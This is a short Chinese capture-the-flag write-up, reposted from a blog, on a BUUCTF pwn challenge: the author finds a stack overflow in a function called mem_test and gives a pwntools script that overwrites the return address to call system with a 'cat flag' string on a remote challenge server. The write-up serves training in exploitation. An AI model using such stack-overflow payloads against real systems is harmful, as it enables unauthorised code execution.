其他分享
首页 > 其他分享> > 日常buu

日常buu

作者:互联网

国际惯例

 

 

Ida

 

 

没啥问题,去看看mem_test函数有没有问题。

 

 

NX还有栈溢出难道是ROP?还是gdb看看hint是啥吧。

 

 

哦豁!

 

 哦豁!

 

 

 

 

那这样思路有了栈溢出system执行catflag。

from pwn import*

r=remote("node3.buuoj.cn",27175)

system_addr = 0x08048440

catflag_addr = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(0x080487E0) + p32(0x080487E0)

r.sendline(payload)

r.interactive()

 

标签:addr,system,catflag,buu,日常,0x080487E0,p32,payload
来源: https://www.cnblogs.com/shidaofu/p/14842984.html